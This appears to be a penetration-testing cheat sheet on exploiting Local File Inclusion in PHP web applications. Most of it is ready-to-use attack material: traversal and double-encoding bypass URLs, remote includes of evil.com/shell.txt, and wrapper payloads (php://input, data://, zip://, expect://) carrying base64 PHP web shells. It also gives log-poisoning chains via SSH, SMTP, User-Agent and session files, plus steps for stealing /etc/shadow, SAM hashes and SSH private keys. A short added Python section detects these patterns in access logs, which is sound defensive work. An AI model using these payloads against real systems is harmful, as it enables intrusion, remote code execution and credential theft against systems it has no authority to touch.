# Local File Inclusion

### Fuzzing with wfuzz

{% embed url="<https://www.hackingarticles.in/a-detailed-guide-on-wfuzz/>" %}

The key is to look for unusual responses and filter the rest out with `-hh` (hide by character count). In this case most responses were around 300 characters, so a response of about 13000 characters meant the included file's contents were being displayed.

The size and shape of that response also give a hint as to how the Local File Inclusion is working.

#### Windows

{% embed url="<https://gist.github.com/korrosivesec/a339e376bae22fcfb7f858426094661e>" %}

Use this list for LFI so we can get credentials for other services on the host.

```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-windows.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```

#### Linux

```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-linux.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```

The guide above should help you, depending on how the website reacts.

Look for files belonging to other services on the host that could give you access:

* [ ] `/etc/passwd` and `/etc/shadow`
* [ ] `/home/<user>/.ssh/id_rsa`: copy it, change its permissions and SSH in
* [ ] Other services on the host: for example FileZilla stores the credentials for its FTP server in cleartext.

#### LFI + TOMCAT

Look at the Tomcat version; depending on it, we can gather credentials for the manager application and gain RCE by uploading a WAR file.

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FZT1W03nPY1PpnUkmHTWB%2Fimage.png?alt=media\&token=90805214-920c-4794-8e34-6d6a633ccbfc)

By traversing to `/usr/share/tomcat9/etc/tomcat-users.xml` we were able to gather credentials.

#### LFI + Redis

{% embed url="<https://lyethar.gitbook.io/methodology/welcome/exploitation/vulnerable-services/redis-exploitation>" %}

Enumerate where Redis can write files, write a PHP reverse shell (or any other code) there, and then use the LFI to include and execute it.

#### LFI + FileZilla

Using the reference list above we can gather credentials for the FileZilla FTP server.

### Bypassing Tricks

```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```

#### Null byte

This has been patched since PHP 5.4.

```
http://example.com/index.php?page=http://evil.com/shell.txt%00
```

#### Double encoding

```
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```

#### From existing folder

```
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```

#### Wrapper php://filter

```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```

### RCE Methods

#### PHP Wrappers

#### Wrapper php://input

```
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"
```

Since we now have code execution, all that's left is to get a reverse shell using one of the payloads from PayloadsAllTheThings.

#### Wrapper data://

```
echo '<?php phpinfo(); ?>' | base64 -w0
# PD9waHAgcGhwaW5mbygpOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
```

Or:

```
menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
```

If there is code execution you should see the `phpinfo()` output; go to `disable_functions` and craft a payload with functions that aren't disabled.

Code execution with:

* exec
* shell_exec
* system
* passthru
* popen

Example:

```
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0
# PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
```

If "Shell done !" appears on the page, there is code execution and you can do things like:

```
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
```

Other variants (the base64 payload below is `<?php system($_GET['cmd']);echo 'Shell done !'; ?>`):

```
http://example.com/index.php?page=expect://id
http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
```

{% embed url="<https://www.youtube.com/watch?v=Jl36YdzKPz4>" %}

#### Wrapper expect://

```
http://example.com/index.php?page=expect://id
```

#### Wrapper zip://

```
# escape the $ so the shell does not expand $_GET before PHP ever sees it
echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php
zip payload.zip payload.php
mv payload.zip shell.jpg
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
```

### LFI to RCE via controlled log file

Append your PHP code to a log file by making a request to the corresponding service (Apache, SSH, ...) and then include that log file.

```
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```

#### RCE via SSH

Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.

```
# quote the username so the shell does not expand $_GET or treat '<' as a redirect
ssh '<?php system($_GET["cmd"]);?>'@10.10.10.10
```

Then include the SSH log files inside the Web Application.

```
http://example.com/index.php?page=/var/log/auth.log&cmd=id
```

#### RCE via vsftpd logs

This FTP server writes its logs to `/var/log/vsftpd.log`. If you have an LFI and can reach an exposed vsftpd server, try logging in with the PHP payload as the username and then read the log file through the LFI.

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FJrUQZRgndW47vGlt38Dk%2F2022-08-13_13-51.png?alt=media\&token=a22a826b-bf34-401e-a806-cf155eda4e77)

#### RCE via Mail

First send an email through the open SMTP server, then include the log file located at `/var/log/mail` (`http://example.com/index.php?page=/var/log/mail`).

```
root@kali:~# telnet 10.10.10.10 25
Trying 10.10.10.10...
Connected to 10.10.10.10.
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.
```

In some cases you can also send the email with the `mail` command line tool.

```
mail -s "<?php system(\$_GET['cmd']);?>" www-data@10.10.10.10 < /dev/null
```

![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FEOSoGIcajs1utYSehE93%2Fimage.png?alt=media\&token=4a8e5994-fc9e-4c05-98f9-f11ef0ae48b3)

#### RCE via Apache logs

Poison the User-Agent in access logs:

```
$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
```

Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.

Then request the logs via the LFI and execute your command.

```
$ curl "http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id"
```

```
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

HTTP/1.1 400 Bad Request
```

Even though the server replies `400 Bad Request`, the raw request is still written to `C:\xampp\apache\logs\access.log`, so including that file through the LFI still executes the shell.
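As a detection-side counterpart to the bypass tricks and the log-poisoning chains above, here is an added Python example (not from the original page) that parses Apache/nginx combined-format access-log lines, normalizes the `page` parameter the way those bypasses require (repeated URL decoding, `%5C` backslashes, dot and slash stuffing) and flags traversal, wrappers, null bytes, absolute paths and PHP open tags in the User-Agent; the log lines and IPs are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

F = r'(?:[^"\\]|\\.)*'  # one quoted log field; tolerates the \" escapes Apache writes inside it
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>' + F + r')" \d{3} \S+ "'
                    + F + r'" "(?P<ua>' + F + r')"')
WRAPPER_RE = re.compile(r"^\s*(php|data|zip|expect|https?)\s*:", re.I)  # the wrappers used on this page
TRAVERSAL_RE = re.compile(r"(?:^|/)\.{2,}(?:/|$)")  # ../ plus the ....// and ..//// stuffing variants
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)

def normalize(value):
    # Peel off %252f double encoding, %5C backslashes and slash runs so every variant collapses to one shape.
    while unquote(value) != value:  # terminates: each pass shortens the string
        value = unquote(value)
    return re.sub(r"/+", "/", value.replace("\\", "/"))

def query_params(path):
    # Split by hand so the ';' inside data:text/plain;base64 payloads is never taken as a separator.
    params = {}
    for pair in urlsplit(path).query.split("&"):
        key, _, val = pair.partition("=")
        params[unquote(key)] = unquote(val)
    return params

def classify_value(value):
    # Findings for one include-parameter value as the application receives it (URL-decoded once).
    norm = normalize(value)
    m = WRAPPER_RE.match(norm)
    checks = [("null-byte", "\x00" in norm), ("wrapper:" + (m.group(1).lower() if m else ""), bool(m)),
              ("traversal", bool(TRAVERSAL_RE.search(norm))), ("absolute-path", norm.startswith("/"))]
    return [name for name, hit in checks if hit]

def analyze_line(line, params=("page", "file")):
    # (ip, findings) for one combined-format access-log line, or None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("req").split(" ")
    findings = [f for k, v in query_params(req[1] if len(req) > 1 else "").items()
                if k in params for f in classify_value(v)]
    # Poisoned User-Agent or request line (the access.log RCE chain); decode so %3C%3Fphp is caught too.
    if PHP_TAG_RE.search(unquote(m.group("ua") + " " + m.group("req"))):
        findings.append("php-tag")
    return m.group("ip"), findings
SAMPLE_LOG = [  # constructed lines, not real traffic
    '10.0.0.9 - - [13/Aug/2022:13:51:02 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 13210 "-" "curl/7.85"',
    '10.0.0.9 - - [13/Aug/2022:13:51:03 +0000] "GET /index.php?page=http:%252f%252fevil.com%252fshell.txt HTTP/1.1" 200 310 "-" "curl/7.85"',
    '10.0.0.9 - - [13/Aug/2022:13:51:05 +0000] "GET / HTTP/1.1" 200 310 "-" "<?php system($_GET[\'cmd\']);?>"',
    '10.0.0.9 - - [13/Aug/2022:13:51:06 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/7.85"',
]
```

Run `[analyze_line(l) for l in SAMPLE_LOG]` to see each constructed line tagged; a jump in response size like the 13210-byte line, combined with a traversal finding, is the same signal the wfuzz section above relies on.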

### LFI to RCE via PHP sessions

Check whether the website uses PHP sessions (`PHPSESSID`):

```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```

In PHP these sessions are stored in `/var/lib/php5/sess_[PHPSESSID]` or `/var/lib/php/session/sess_[PHPSESSID]` files.

```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```

Store the payload in the session (here through the `user` field) by setting it to `<?php system('cat /etc/passwd');?>`:

```
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
```

Then use the LFI to include the PHP session file:

```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```

### LFI to RCE via credentials files

This method requires high privileges inside the application in order to read the sensitive files.

#### Windows version

First extract the `sam` and `system` files:

```
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
```

Then extract the hashes from these files with `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat`/`john` or replay them using the Pass-the-Hash technique.

#### Linux version

First extract the `/etc/shadow` file:

```
http://example.com/index.php?page=../../../../../../etc/shadow
```

Then crack the hashes inside it in order to log in via SSH.

Another way to gain SSH access to a Linux machine through LFI is by reading the private key file `id_rsa`. If SSH is active, check which user is in use via `/proc/self/status` and `/etc/passwd`, then try to access `/<HOME>/.ssh/id_rsa`.

<details>

<summary>Examples of Local File Inclusion Exploitation</summary>

<https://app.gitbook.com/s/C01qT6YExS9JZIncykrV/exploitation> (Slort PG)

</details>

### Resources

{% embed url="<https://book.hacktricks.xyz/pentesting-web/file-inclusion>" %}

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion>" %}

{% embed url="<https://guide.offsecnewbie.com/web>" %}

{% embed url="<https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html#local-file-inclusion--remote-file-inclusion---lfi--rfi>" %}
